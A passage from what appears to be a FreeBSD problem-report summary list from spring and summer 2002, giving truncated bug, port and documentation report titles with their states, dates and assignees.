error handling la o [2002/04/17] docs/37176 ru similar nits in assorted man pages o [2002/04/17] ports/37185 ports New Port: nrpep (netsaint remote plugin e f [2002/04/17] ports/37186 ade Dbview contains an error, because of whic o [2002/04/17] ports/37187 mita ports/japanese/vfghostscript font-2.6.2 f o [2002/04/17] ports/37195 ports New port: deskutils/mencal o [2002/04/17] ports/37215 ports LablGL port: An OpenGL interface for Obje o [2002/04/17] ports/37216 ports new LablGTK port: A GTK+ interface for Ob o [2002/04/18] misc/37219 [it_IT locale] LC_TIME, weekday names o [2002/04/18] docs/37221 doc obsolete reference to seqpacket in mount_ o [2002/04/18] ports/37226 mita ports/japanese/vfghostscript5 doesn't fin o [2002/04/18] kern/37227 VMWare do not work with raw disks due to o [2002/04/19] misc/37244 ports c2lib port includes vector.h which appare p [2002/04/19] bin/37250 yar [PATCH] ftpd(8) cannot delete stale symli o [2002/04/19] ports/37255 ports New port: chinese/cce o [2002/04/20] ports/37289 flathill Update net/micq to 0.4.8.pl3 o [2002/04/20] ports/37290 ports New port: tool for setting the title of x o [2002/04/20] ports/37298 ports New port: security/cp2fwb o [2002/04/20] misc/37301 4.5 rc.firewall type simple does not pass o [2002/04/21] conf/37310 add inode information into daily_status_d o [2002/04/22] bin/37334 phk fix jail.8 instructions for creating jail o [2002/04/22] ports/37337 portmgr [repo-copy request] converters/mule-ucs-e o [2002/04/22] ports/37342 ambrisko ports/misc/airoflash fetches source every o [2002/04/22] kern/37347 _POSIX_THREADS defined but sysconf(_SC_TH o [2002/04/22] ports/37354 ports New port: Perl-compatible regexp for Ocam o [2002/04/22] ports/37359 ports New port: games/bsp - A node builder for o [2002/04/22] ports/37362 ports The Ted port is incompatible with FreeBSD o [2002/04/22] ports/37364 ports New Port: GeekLog o [2002/04/23] ports/37366 kde kdeutils-3.0: kdepasswd truncates passwor o [2002/04/23] ports/37367 ports palm/plucker: fix build problem when late o [2002/04/23] kern/37374 joe [PATCH] closing ums0 blocks with wmesg uh o [2002/04/23] kern/37378 scsi [PATCH] No 6-byte-read on Wincan USB pen o [2002/04/23] i386/37379 /dev/MAKEDEV entry for RocketPort is brok o [2002/04/23] misc/37380 boot0 partition list is outdated (patch i o [2002/04/23] misc/37387 bsdmainutils/calendar Hungarian addon fil o [2002/04/23] ports/37389 ports Port Update sysutils/diskusage o [2002/04/23] conf/37395 peter even with NO_SENDMAIL=true, /usr/sbin/sen o [2002/04/23] conf/37404 delayed mouse response to draw box or hig o [2002/04/23] kern/37405 Support for Mitsumi USB Mouse with Memory o [2002/04/24] ports/37409 znerd New port: jdictionary-eng-hun 1.2 - Hunga o [2002/04/24] ports/37412 ports kdebase2 port package does not create /us p [2002/04/24] bin/37416 fanf [PATCH] sshd doesn't set the root login c o [2002/04/24] kern/37417 Treat CT5880 revision4 ( PCM chip ) o [2002/04/24] ports/37422 ports port upgrade news/diablo 3.0 -> 4.1 o [2002/04/24] bin/37424 nfsstat reports negative values o [2002/04/24] misc/37425 df gives wrong ouput > 1TB o [2002/04/24] misc/37434 dhclient generates pointless log messages o [2002/04/24] bin/37437 Add HTTP-style support to {vis,unvis}(1). o [2002/04/24] ports/37439 anders Alfred's Patches to thttpd port to use se o [2002/04/24] bin/37442 [PATCH] sleep.c to support time multiplie o [2002/04/25] ports/37446 znerd New port: jdictionary-eng-hun-expr 1.2 - p [2002/04/25] bin/37448 obrien [PATCH] ldd/rtld support for more informa o [2002/04/25] ports/37452 ports New port: devel/publib: Modular library o o [2002/04/25] docs/37457 doc acpi(4) man page references non-existant o [2002/04/25] ports/37459 ports Patch for ocaml-pcre port (PR 37354) o [2002/04/25] ports/37462 jmz dvips is no more available separately fro o [2002/04/25] docs/37465 doc Handbook needs new section o [2002/04/25] ports/37469 ports new port: otc o [2002/04/25] docs/37470 doc jail field not documented in procfs(5) o [2002/04/25] ports/37474 ports freeamp doesn't build on -current o [2002/04/25] ports/37476 ports Updating the port of biology/molden o [2002/04/26] kern/37486 Bug in network stack in sending broadcast o [2002/04/27] docs/37504 blackend The word PC Card should be used instead o o [2002/04/27] ports/37518 grog gmat port CATALOG needs updating o [2002/04/28] ports/37521 ports new port: security/autossh o [2002/04/28] kern/37526 Addtron card not being recognized by driv o [2002/04/28] ports/37536 ports New port: games/doomlegacy o [2002/04/28] ports/37542 anholt XFree86 4.2.0 Server MGA G550 Corrupted H o [2002/04/29] kern/37554 [PATCH] Make ELF shared libraries immutab o [2002/04/29] kern/37555 vnode flags appear to be changed in non-s o [2002/04/29] docs/37557 doc there is no ciss(4) RAID controller man p o [2002/04/29] docs/37558 doc there is no iir(4) RAID controller man pa o [2002/04/29] docs/37559 doc there is no ida(4) RAID man page o [2002/04/29] misc/37562 jdp Incorrect information in /usr/share/examp o [2002/04/29] ports/37567 ports New port devel/qextmdi o [2002/04/29] misc/37569 [PATCH] Extend fstab(5) format to allow f o [2002/04/29] bin/37572 des libfetch(3)/fetch(1): requested feature: o [2002/04/29] ports/37574 taoka ports/print/pips-sc20 file not found on m a [2002/04/29] ports/37576 portmgr Opening new port category hungarian o [2002/04/30] ports/37594 ports Update port misc/mango to 0.11 (SUPERCEED o [2002/04/30] ports/37596 ports EMACS_PORT_NAME=xemacs21 forks make infin o [2002/04/30] ports/37597 ports aureal-kmod-1.5_3 fails to build o [2002/04/30] kern/37600 [Partial PATCH] t4dwave drive doesn't rec o [2002/04/30] conf/37611 phk proposed /etc/rc.jails for jail(8) manage o [2002/05/01] ports/37630 kde KDE does not work with IPv6 o [2002/05/01] ports/37632 ports new port: pstack o [2002/05/01] misc/37634 FTP site problem - packages link points t o [2002/05/01] ports/37638 ports gd doesn't build with TrueType support o [2002/05/01] ports/37649 dirk devel/pear: unbreaking, upgrading to 4.2, o [2002/05/01] bin/37650 Add skipPCCARD variable to sysinstall o [2002/05/01] ports/37654 ports Update textproc/xml4j to 4.0.1HTML conve o [2002/05/20] ports/38339 ports New Port: Stylesheets for TEI->FO convers o [2002/05/20] ports/38340 ports New Port: DTD parser and clean-up tool o [2002/05/20] ports/38341 ports New Port: Customize TEI DTDs o [2002/05/20] ports/38346 jkh ports/net/cvsupit couldn't get enough fil o [2002/05/20] misc/38347 new library function abs2rel and rel2abs. o [2002/05/20] ports/38351 ports mod_php4(WITH_APACHE2) +apache2(WITH_THRE o [2002/05/20] ports/38365 ports devel/swarm update for Java support o [2002/05/21] kern/38372 patch for puc(4) to support parallel port o [2002/05/21] bin/38388 request to add "openssl starttls" command o [2002/05/21] ports/38396 ports jikes option "-encoding" does not work an o [2002/05/22] ports/38406 obrien incorrect .so in g++31.1 man page o [2002/05/22] ports/38408 wjv zope-zmysqlda does not run o [2002/05/22] kern/38419 add name "CanoScanN676U" in uscanner o [2002/05/22] docs/38426 doc extra manpage .Xr to locate relevant sysc o [2002/05/22] kern/38429 [PATCH] getgpid and getsid work for proce o [2002/05/22] kern/38445 Centralized ptrace() permission checking o [2002/05/23] ports/38450 ports New Port: audio/blop: Bandlimited oscilla o [2002/05/23] ports/38451 kris the package of totd-1.3_1.tgz seems incor o [2002/05/23] misc/38452 Logitech USB iFeel: device_probe_and_atta o [2002/05/23] kern/38458 There is no a file iicbb_if.c on source t o [2002/05/23] bin/38467 less can dump core, FPU exception o [2002/05/23] misc/38468 Write drivers for Intel PRO/Wireless 2011 o [2002/05/23] ports/38476 ports ports/security/nmapfe: install problem o [2002/05/23] i386/38477 qa In sysinstall's Choose Distributions scre o [2002/05/23] i386/38478 qa In sysinstall's Choose Distributions scre o [2002/05/23] i386/38479 sysinstall vs. adduser UID inconsistency o [2002/05/23] i386/38480 qa sysinstall should prompt for normal users o [2002/05/23] i386/38481 adduser typo: 'already exist' o [2002/05/24] ports/38493 nbm Port update: mail/courier-imap o [2002/05/24] www/38500 www gnats web form is overenthusiastic about o [2002/05/24] ports/38516 ports ICQv7 transport for the Jabber Server o [2002/05/24] i386/38524 cons25 doesn't support F-keys beyond 12 o [2002/05/25] ports/38539 ports New port: devel/libcfg+ o [2002/05/25] docs/38540 rpratt sysinstall application name should be Sys o [2002/05/25] ports/38541 ports ghostscript-gnu checksum mismatch for a d o [2002/05/25] ports/38555 ports New port: x11-toolkits/frantk (A GUI libr o [2002/05/25] docs/38556 doc EPS file of beastie, as addition to exist o [2002/05/25] conf/38559 rc.network hangs for a long time attempti o [2002/05/26] ports/38563 keith chinese/ghostscript6 print/ghostscript-gn o [2002/05/26] bin/38573 ping -o option (exit after one reply) o [2002/05/26] docs/38574 doc CPUTYPE is not documented in make.conf o [2002/05/26] kern/38575 NoName USB Flash drive not working o [2002/05/26] misc/38583 qa sysinstall installs crypto sources when / o [2002/05/26] ports/38593 portmgr Third level ports o [2002/05/26] i386/38596 freebsd 4.6rc2 can't support ati videocar o [2002/05/27] bin/38610 qa Sysinstall should be able to mount ISO im o [2002/05/27] ports/38616 ports Build options in Makefile.local are ignor o [2002/05/27] docs/38618 doc Malloc types can be used with multiple al o [2002/05/27] docs/38620 doc Committers Guide and CVS o [2002/05/27] ports/38621 mita Update port: print/ghostscript-gnu-commfo o [2002/05/27] ports/38624 ports linc will not be installed by ORBit2 o [2002/05/27] kern/38626 luigi dummynet/traffic shaper: RED: max_th and o [2002/05/27] docs/38630 doc Missing line break in handbook/ppp-and-sl o [2002/05/27] ports/38635 ports new port: comms/bforce-kst o [2002/05/27] ports/38638 ports New ports : gfaim 0.30 o [2002/05/27] ports/38642 ports Fatal server error o [2002/05/27] docs/38647 doc cvsupit built-in instructions are slightl o [2002/05/28] ports/38655 ports Update New port : ports/38641 (DynDns Ser o [2002/05/28] kern/38657 fujitsu c4110 lifebook crashes on resume o [2002/05/28] ports/38663 ports New Port: Mono .NET runtime and C# compil o [2002/05/28] www/38664 www Stale info about Java due to be released o [2002/05/28] docs/38668 blackend More s/IPSec/IPsec o [2002/05/28] ia64/38677 ia64 savecore fault when 1M buffer is allocate o [2002/05/28] ia64/38678 ia64 vinum fails to build due to @gprel reloca o [2002/05/29] bin/38686 des fetch -T n is not timeout correctly when o [2002/05/29] ports/38687 ports Update port: security/fwbuilder o [2002/05/29] ports/38689 kuriyama update of port palm/prc-tools o [2002/05/29] ports/38696 ports libwmf port configure failure (with worka o [2002/05/29] misc/38724 portmgr [patch] various .mk files use deprecated o [2002/05/29] ports/38725 ports new port: biology/L-Breeder o [2002/05/29] misc/38727 mptable should complain about garbage arg o [2002/05/29] kern/38730 Memorex scrollpro mouse is not fully func o [2002/05/30] kern/38749 Diskless booting fails with some DHCP ser o [2002/05/30] ports/38751 ports Port for discid o [2002/05/31] docs/38772 doc firewall_type feature not mentioned on Ha o [2002/05/31] ports/38790 nakai icewm - ALT-TAB graphical glitches o [2002/05/31] kern/38792 Cannot play audio on a VIA VT8233 chipset o [2002/06/01] ports/38800 ports update www/roxen to Roxen WebServer 2.2.2 o [2002/06/02] ports/38805 ports New port: devel/greencard (A foreign func o [2002/06/02] ports/38806 dirk Please upgrade the LyX port to version 1. o [2002/06/02] docs/38810 doc Minor change in section 2.13.5 of the Han o [2002/06/02] docs/38815 doc Many typo fixed, and a question left unan o [2002/06/02] docs/38817 doc /usr/share/man/man8/boot.8.gz documents / o [2002/06/02] ports/38820 keith Update port: chinese/ttfm update abiword o [2002/06/02] ports/38821 gnome graphics/gimp1 complains about missing Gi o [2002/06/02] ports/38824 sf wget cannot handle files >2GB o [2002/06/02] i386/38826 RFE: BootMgr should provide more identify o [2002/06/02] kern/38828 DPT PM2012B/90 doesn't work o [2002/06/02] conf/38829 bootblock recompile instructions in handb o [2002/06/02] misc/38839 inconsistent spelling of communism in for p [2002/06/03] docs/38850 keramida handbook/kernelopts/ should be in Develop o [2002/06/03] ports/38853 portmgr net/ethereal: configure fails o [2002/06/03] misc/38854 Resetting the sysinstall during setup cau o [2002/06/03] ports/38855 ports net/gtk+licq does not work o [2002/06/03] misc/38857 obrien "file" command hangs when using "-z" opti o [2002/06/03] ports/38861 ports www/auth_ldap compiles-installs but fails o [2002/06/03] i386/38863 Burning CDs crashes since 4.6stable o [2002/06/03] misc/38870 kernel-panic when coping data from a NFS- o [2002/06/03] ports/38876 tegge devel/linuxthreads: pkg-plist ignores NOP f [2002/06/04] kern/38886 Maxtor 3000LE requires another sys/cam/sc o [2002/06/04] ports/38899 ports New port: Yahoo transport for the Jabber o [2002/06/05] ports/38914 ports New Port: zed o [2002/06/05] ports/38915 ports New port: "MOVA" - Scripts for Work with o [2002/06/05] ports/38917 nik Update port: print/jadetex (create jadete o [2002/06/05] i386/38919 imp A Belkin 802.11 PCMCIA card is not recogn o [2002/06/05] kern/38923 Incorrect device use count prevents door o [2002/06/05] docs/38924 gshapiro Mailwrapper(8) or mailer.conf(5) should m p [2002/06/05] bin/38928 maxim [PATCH] ftpd(8) logs aborted transfers in o [2002/06/05] bin/38931 Cleanup for WARNS=4 of src/games/fortune/ o [2002/06/05] misc/38937 delay between tracks in digital audio dum o [2002/06/05] ports/38938 ports New port: gnome/bubblemon - A CPU and mem o [2002/06/05] bin/38940 Change: an option to *stat to allow supre o [2002/06/06] ports/38950 ports perforce Makefile doesn't do PORTREVISION o [2002/06/06] ports/38952 ports Upgrade omniORB to 3.0.5 o [2002/06/06] ports/38955 ports Update port py-omniorb to version 1.5 o [2002/06/06] gnu/38956 stock awk installs gawk.1 manpage, overri o [2002/06/06] ports/38958 ports New port: MySQLMan - a web based MySQL da o [2002/06/06] ports/38961 znerd mod_jk, dependencies outdated o [2002/06/06] misc/38965 kde [PATCH] kapptemplate fails on FreeBSD f [2002/06/06] ports/38966 kde [PATCH] AUTO_SUBDIRS used instead of AUTO o [2002/06/06] kern/38967 4/22/02 pcm driver merge appears to break o [2002/06/07] docs/38982 doc developers-hanbook/Jail fix o [2002/06/07] kern/38986 a change to msdosfs permissions behaviour o [2002/06/07] ports/38989 assar Fix to BROKEN arla port (arla-0.35.6) o [2002/06/07] ports/39005 sobomax freetype2 port fetches an HTML page, not o [2002/06/07] ports/39007 ports ringtonetools for the ports f [2002/06/08] i386/39023 Keystrokes yield extended ASCII o [2002/06/08] ports/39030 ports New port: www/p5-Apache-Gallery - mod_per f [2002/06/08] kern/39031 bugreport: kernel o [2002/06/08] docs/39038 doc Reference in a non existent man page. o [2002/06/08] docs/39044 doc The man page for rot13(6) never mentions o [2002/06/08] kern/39047 IPSEC Compression (IPCOMP) broken in tunn o [2002/06/08] ports/39054 portmgr Support USE_OPENSSL=yes in bsd.port.mk o [2002/06/09] ports/39059 ports New port: IMCom command-line Jabber clien o [2002/06/09] docs/39060 doc Typos (Ths, counties) in share/misc/iso31 o [2002/06/09] ports/39062 ports beep: beep for a pitch and duration o [2002/06/09] www/39068 www Hypertext man pages use strange hyphen at o [2002/06/09] ports/39080 sobomax java/javavmwrapper: Functionality enhance o [2002/06/09] docs/39084 doc Various tweaks to doc/en_US.ISO8859-1/boo o [2002/06/09] ports/39086 ports Update kappdock to 0.46-1 so as to run un o [2002/06/10] ports/39094 portmgr request for new category: parallel o [2002/06/10] ports/39095 ports ports/net/nttcp and ports/net/ttcp appear o [2002/06/10] docs/39101 doc Misplaced parenthesis in the FAQ? o [2002/06/10] ports/39102 portmgr new category requested: finance o [2002/06/10] ports/39103 portmgr new virtual category requested: accessib o [2002/06/10] ports/39114 ports Checksum mismatch in flvw port p [2002/06/10] bin/39116 tjr /usr/bin/printf o [2002/06/10] ports/39124 ports upgrade ports/russian/fortunerus p [2002/06/10] conf/39125 dougb [PATCH] /etc/usbd.conf should enable curs o [2002/06/10] docs/39129 doc handbook; type WRT simulating postscript o [2002/06/10] ports/39131 ports litestream port obsolete o [2002/06/10] ports/39133 nbm upgrade port: phpMyAdmin o [2002/06/10] ports/39136 ports Enable arts in SDL o [2002/06/10] ports/39137 ports update port: qmail-tls o [2002/06/11] ports/39140 ports New Port: Acrobat Reader 5 CJK font packs o [2002/06/11] ports/39144 ports Port Upgrade (parmetis) o [2002/06/11] ports/39147 ports minor editors/emacs20 build problem o [2002/06/11] bin/39163 dwmalone -nt/-ot in test(1) does not detect if tv_ o [2002/06/11] docs/39164 doc Misprint in units(1).lib (aganist) o [2002/06/11] ports/39166 ports new port: www/p5-Apache-AntiSpam o [2002/06/11] ports/39174 ports Need port of SBCL (Steel Bank Common Lisp o [2002/06/11] ports/39178 ports new port: games/crack-attack (An OpenGL g o [2002/06/11] ports/39182 ports netsaint-plugins util.c functions don't q o [2002/06/12] ports/39189 ports lang/clisp needs gcc295 (coredumps with 3 o [2002/06/12] docs/39190 blackend Missing quote tags in releng-packages art o [2002/06/12] conf/39192 [PATCH] Save pcm mixer settings during re o [2002/06/12] ports/39193 ports [maintainer-update] net/papaya update to o [2002/06/12] ports/39197 sobomax /usr/ports/archivers/ucl is outdated o [2002/06/12] bin/39198 sh aborts on variables with periods o [2002/06/12] misc/39201 ptrace(2) and rfork(RFLINUXTHPN) confuse o [2002/06/12] ports/39204 ports New port: deskutils/mnemo, a web-based no o [2002/06/12] bin/39206 core dump bug in sshd o [2002/06/12] ports/39207 ports [NEW PORT] x11-toolkits/gtk20-apireferenc o [2002/06/12] docs/39213 doc No rc(4) man page o [2002/06/12] docs/39214 doc No my(4) man page o [2002/06/12] ports/39215 nakai Update emulators/gngb to latest snapshot o [2002/06/13] ports/39219 ports ddd port not builds on -CURRENT o [2002/06/13] ports/39228 ports native port of vsound 0.5 o [2002/06/13] misc/39229 instruction pointer = 0x8:0xc00eaf13 o [2002/06/13] ports/39250 ports New port: lang/cmucl-extra o [2002/06/13] ports/39251 chuckr Update octave port o [2002/06/13] standards/39256standards[v]snprintf aren't POSIX-conformant for s o [2002/06/13] docs/39257 doc printf manpage doesn't document error ret o [2002/06/13] ports/39258 anders mail/cclient doesn't build on freebsd/spa o [2002/06/14] docs/39293 doc the dumpon man page incorrectly states th o [2002/06/14] ports/39304 ports Maintainer Update: textproc/jdictionary ( o [2002/06/14] conf/39306 The /etc/rc file should know if is runnin o [2002/06/14] ports/39307 ports New port: ASpath-tree a IPv6 route stabil o [2002/06/14] ports/39308 portmgr New port: hu-ispell 0.85 (Hungarian spell o [2002/06/14] bin/39311 qa you can't enable inetd in sysinstall with o [2002/06/14] ports/39312 ports [PATCH] Addition of mysql-awareness to mo o [2002/06/14] ports/39317 hoek uulib port fails to build due to sed(1) r o [2002/06/15] misc/39326 execve() for ELF exe drops VTEXT when re- o [2002/06/15] ports/39342 sobomax Add automatic truetype support to Mozilla o [2002/06/15] misc/39347 use of /usr/bin/* utils in /etc/rc.diskle o [2002/06/15] docs/39348 doc kenv fetch of hostname requires dhcp/boot o [2002/06/15] ports/39349 perky build fix of databases/db3 for -current o [2002/06/15] misc/39353 /usr/share/examples/diskless clone root c o [2002/06/15] ports/39357 ports Maintainer update: biology/ncbi-toolkit o [2002/06/16] misc/39360 If linux emu is added as a dependency (an o [2002/06/16] ports/39361 ports New port: chinese/xpdf o [2002/06/16] ports/39364 ports new port: cad/gwave o [2002/06/16] ports/39370 ports Update port: japanese/dvipsk-vflib o [2002/06/16] ports/39371 ports o [2002/06/16] ports/39375 ports astro/seti_applet depends on libgtop whic o [2002/06/16] ports/39383 ports update for comms/qpage port o [2002/06/16] ports/39390 gnome Make graphics/imlib not depend upon GTK+ f [2002/06/16] misc/39394 4.6 does not run as VMware guest OS o [2002/06/17] ports/39406 perky Update port: devel/sip o [2002/06/17] ports/39407 perky Update port: x11-toolkits/py-qt o [2002/06/17] ports/39413 ports [maintainer-update] net/gnugadu o [2002/06/17] ia64/39415 ia64 Bootloader assuming 8KB buffer when only o [2002/06/17] ports/39416 ports New port: t2ps o [2002/06/17] ports/39417 gnome gtk-config and glib-config filename conve o [2002/06/17] ports/39421 ports New Port: smapi2-library for various FTN- o [2002/06/17] kern/39423 silby vr0 watchdog timeout o [2002/06/17] misc/39425 Auto mounted directory was not found at b o [2002/06/17] misc/39439 tcopy will not duplicate tapes with block f [2002/06/17] ports/39440 dima Make pilot-link compile with GCC3 on -CUR o [2002/06/17] ports/39454 portmgr net/kmsn needs to be replaced by kmerlin o [2002/06/18] bin/39463 [PATCH] Add several options to fingerd o [2002/06/18] misc/39466 find -xdev hangs on dead NFS mounts (/etc o [2002/06/18] ports/39469 ports new FreeBSD port mail/avcheck o [2002/06/18] ports/39470 ports Update port: devel/sdts++ o [2002/06/18] ports/39476 ports profxp will run but when you fxp a file i o [2002/06/18] ports/39487 mharo portlint doesn't accept MASTER_SITE/DISTF o [2002/06/18] ports/39492 portmgr devel/autoconf picks up non-standard shel o [2002/06/19] ports/39504 gnome textproc/libxml2 & invalid XML catalogs i o [2002/06/19] conf/39505 automate BUILDNAME variable for releases o [2002/06/19] kern/39527 dwmalone getcwd() and unreadable parent directory o [2002/06/19] docs/39530 doc access(2) man page has unnecessarily broa o [2002/06/19] docs/39532 doc 'find' man page should o [2002/06/19] conf/39537 imp External ThinkPad 240 cdrom does not work o [2002/06/19] ports/39538 openofficeNew Port: chinese/openoffice-zh_TW o [2002/06/19] ports/39544 ports mayavi port disfunctional o [2002/06/19] ports/39550 ports the port doesn't install all the files li o [2002/06/20] i386/39574 qa Error mounting /dev/acd0c on /dist: No su o [2002/06/20] bin/39576 [PATCH] tail -f for multiple files p [2002/06/20] bin/39578 add more russian holydays o [2002/06/20] conf/39580 insecure default settings o [2002/06/20] i386/39584 ln -f fails to unlink o [2002/06/20] ports/39585 nbm Update of ports/mail/courier-imap to 1.4. o [2002/06/20] ports/39593 znerd jakarta-tomcat has unnecessary and/or inc o [2002/06/20] ports/39597 ports New port: jdictionary-eng-hun 1.4 - Hunga o [2002/06/20] ports/39598 ports New port: jdictionary-eng-hun-expr 1.4 - o [2002/06/20] ports/39600 znerd New port: jdictionary-ger-hun 1.4 - Germa o [2002/06/20] ports/39601 ports New port: JDictionary plugin: French-Hung o [2002/06/20] ports/39602 ports New port: JDictionary plugin: Interlingua o [2002/06/20] ports/39603 znerd New port: jdictionary-eng-ger 1.4 - Engli o [2002/06/20] ports/39606 ports Updated port: audio/lame (3.92) o [2002/06/20] ports/39608 ports upgrade games/cgoban to 1.9.13 o [2002/06/20] ports/39610 ports update www/p5-Apache-DBI to 0.89 o [2002/06/21] misc/39619 flashplugin-mozilla crashes and doesnt pl o [2002/06/21] ports/39620 ports flashplugin-mozilla crashes when viewing o [2002/06/21] ports/39621 ports isc-dhcpd server can't get all network in o [2002/06/21] ports/39627 chein new camserv won't compile, use old for no o [2002/06/21] misc/39628 Please add new terminal definition to /us o [2002/06/21] ports/39631 ports port eyeclock unaligned access on alpha o [2002/06/21] ports/39634 jim Port pclock unaligned access on alpha o [2002/06/22] kern/39650 Digital audio extraction on an atapi CD d f [2002/06/22] ports/39666 ports New Port: gwenview (Graphicbrowser for KD o [2002/06/22] ports/39673 ports netsaint-plugins fails to install command o [2002/06/22] bin/39676 lukemftpd manual pages fix + examples o [2002/06/22] kern/39681 hidden kernel boot tunables added to sysc o [2002/06/22] ports/39683 keith Update port: chinese/moefonts-cid o [2002/06/22] ports/39684 keith Delete port: chinese/ghostscript6 o [2002/06/22] ports/39686 mbr [PATCH] www/mod_frontpage: Detect Documen o [2002/06/23] ports/39690 ports Update - New Port: gwenview (Graphicbrows o [2002/06/23] ports/39697 ports New port: arson - CD burning and ripping o [2002/06/23] ports/39705 ports ${PERL} -> ${REINPLACE_CMD} o [2002/06/23] ports/39707 ports New Port: scmxx 0.6.1.3 (Data Exchange ut o [2002/06/23] ports/39717 nbm update of courier-imap port. o [2002/06/23] ports/39723 ports New port: hu-phone - Hungarian phone code o [2002/06/23] ports/39728 ports New port: hu-zipcodes - Hungarian post co o [2002/06/23] ports/39744 ports ${PERL} -> ${REINPLACE_CMD} o [2002/06/23] ports/39745 ports ${PERL} -> ${REINPLACE_CMD} o [2002/06/23] docs/39748 doc [PATCH] Some changes to aio_*(2) o [2002/06/23] docs/39751 doc handbook/ports-using.html sysinstall clar o [2002/06/23] ports/39755 ports ${PERL} -> ${REINPLACE_CMD} o [2002/06/24] misc/39772 imp pccardd is slow to install a PCCARD. o [2002/06/24] ports/39777 ports New port: security/libsectok o [2002/06/24] ports/39778 ports New port: security/sectok o [2002/06/24] misc/39787 T/TCP support o [2002/06/24] ports/39791 ports ${PERL} -> ${REINPLACE_CMD} o [2002/06/24] ports/39792 ports ${PERL} -> ${REINPLACE_CMD} o [2002/06/24] ports/39794 ports ${PERL} -> ${REINPLACE_CMD} o [2002/06/24] ports/39799 dirk mod_php4, among other ports, maintains no o [2002/06/24] ports/39801 ports New port: kpovmodeler - a KDE frontend fo o [2002/06/24] ports/39803 dirk newer version of lyx (1.2.0) available o [2002/06/24] ports/39806 ports New port: knights - a KDE frontend for cr o [2002/06/24] kern/39809 PATCH: remove cam_extend array usage o [2002/06/24] bin/39816 cleaning sbin/camcontrol code from warnin o [2002/06/24] bin/39817 cleaning sbin/disklabel code from warning o [2002/06/24] bin/39818 cleaning sbin/atm code from warnings o [2002/06/24] bin/39819 tjr cleaning bin/sh code from warnings o [2002/06/24] docs/39822 doc firewall.7: change "Mbits" to "Mbits/s" a o [2002/06/24] docs/39824 doc Various tweaks for doc/en_US.ISO8859-1/bo o [2002/06/25] ports/39847 ports New port: dump9660 o [2002/06/25] docs/39852 doc Handbook: treatment of KERNCONF is incons o [2002/06/25] ports/39854 ports New port: kdirstat - A small KDE utility o [2002/06/25] misc/39864 robert hostname instead of IP in w -n output o [2002/06/25] bin/39865 cleaning sbin/fsck code from some warning o [2002/06/25] bin/39866 cleaning sbin/fsdb code from warnings o [2002/06/25] bin/39867 cleaning sbin/mount_cd9660 and sbin/mount o [2002/06/25] bin/39868 cleaning sbin/dump code from warnings o [2002/06/25] ports/39871 adrian [new port] sysutils/lire o [2002/06/26] ports/39882 ports pptp client does not install from port in o [2002/06/26] ports/39888 ports New Port: ports/math/maxima o [2002/06/26] bin/39893 setusercontext library call differs umask o [2002/06/26] ports/39895 ports New Port: ports/lang/screamer o [2002/06/26] ports/39900 ports New port: fmirror o [2002/06/26] ports/39901 ports Convert java/jsdk to use bsd.java.mk o [2002/06/26] ports/39902 ports Convert www/apache-jserv to use bsd.java. o [2002/06/26] bin/39904 cleaning sbin/sysctl code from warnings o [2002/06/26] bin/39905 cleaning sbin/restore code from warnings o [2002/06/26] bin/39907 cleaning sbin/savecore code from warnings o [2002/06/26] misc/39911 New Netgear MA401 pccard does not work wi o [2002/06/26] ports/39912 ports new port of ITS RP06 filesystem image for o [2002/06/27] ports/39917 ports Update Port: x11/wmmenu 0.9 -> 1.2 o [2002/06/27] ports/39926 ports [NEW-PORT] EKG - client for Polish instat o [2002/06/28] ports/39946 ports Shift-Tab navigation doesn't work in tk-8 o [2002/06/28] misc/39951 Sendmail 8.12.3 and `msgs' alias o [2002/06/28] ports/39955 ports new port of KLH10 PDP-10 mainframe emulat o [2002/06/28] ports/39957 ports New port: databases/jdb o [2002/06/28] ports/39962 ports ports/astro ${PERL} -> ${REINPLACE_CMD} o [2002/06/28] ports/39963 ports New port: Tool to convert Outlook .pst to o [2002/06/28] ports/39964 ports ports/audio misc Makefile cleanup o [2002/06/28] ports/39965 portmgr ports/Mk/bsd.port.mk add several tools o [2002/06/28] ports/39968 ports ports/cad misc Makefile cleanup o [2002/06/28] ports/39969 ports ports/benchmarks misc Makefile cleanup o [2002/06/28] ports/39971 ports ports/comms minor Makefile cleanup o [2002/06/28] ports/39972 ports ports/databases misc Makefile cleanup o [2002/06/28] ports/39973 ports ports/deskutils misc Makefile cleanup p [2002/06/28] kern/39974 silby fxp driver doesn't detect the 82562 chips o [2002/06/28] conf/39976 vi recovery halting boot process o [2002/06/28] kern/39977 Device polling support for em(4) driver o [2002/06/28] ports/39978 ports ports/devel misc Makefile cleanup o [2002/06/29] ports/39998 ports Makefile for netpbm port has several flaw o [2002/06/29] ports/40000 ports New port: a java-like thread library for o [2002/06/29] ports/40002 wjv py-4suite: XSLT import error o [2002/06/29] ports/40004 trevor ports/audio/festlex-ogi has a checksum er o [2002/06/29] ports/40009 ports distinfo file for ports/security/cyrus-sa o [2002/06/29] kern/40017 [patch] allows config(8) to specify confi o [2002/06/29] kern/40021 [patch] use ld(1) to build kernel with li o [2002/06/30] misc/40038 src/share/man/man4/ifmib.4 : syntax error o [2002/06/30] bin/40047 "make release" fails in games/adventure ( o [2002/06/30] misc/40057 bugbusterssend-pr -a flag does not work with -f o [2002/06/30] kern/40058 lockup on 5.0 DP1 - Xircom X3201 (RealPor o [2002/06/30] www/40060 www Web page /project/ppc.html could use smal o [2002/06/30] ports/40061 ports [new port] games/sopwith o [2002/07/01] ports/40069 dirk mod_php4 doesn't compile with apache2 (& o [2002/07/01] ports/40072 ports port upgrade/new port graphics/sinek: a l o [2002/07/01] ports/40074 dwcjr configurationprogram for samba does not w o [2002/07/01] ports/40078 ports Update port: print/ghostscript-afpl (fix o [2002/07/01] ports/40079 ports Update port: print/ghostscript-gnu (fix p o [2002/07/01] ports/40080 dirk Update port: print/lyx to 1.2.0 o [2002/07/01] misc/40081 noise in sound output with built-in CMedi o [2002/07/01] standards/40084standardsg++ complaining about redeclaration of wc o [2002/07/01] ports/40087 ports Specifying USE_GCC to "make clean" hangs o [2002/07/01] misc/40090 Missing line in kernel config file o [2002/07/01] ports/40097 ports Update port: graphics/lablgl fix ld.conf o [2002/07/01] ports/40098 ports New port: x11-toolkits/lablgtk: An ocaml o [2002/07/01] ports/40105 ports New port: Qinx theme/style for KDE o [2002/07/02] ports/40107 trevor ports/audio/festogi-spanish has a checksu o [2002/07/02] ports/40110 dirk add mnoGoSearch extensions to www/mod_php o [2002/07/02] ports/40116 ports New port: graphics/gtkam (fix ports/39159 o [2002/07/02] conf/40120 gshapiro Existing rc.sendmail in -STABLE doesn't a o [2002/07/02] ports/40121 ache standard Apache port creates sbin link o [2002/07/02] ports/40124 ports 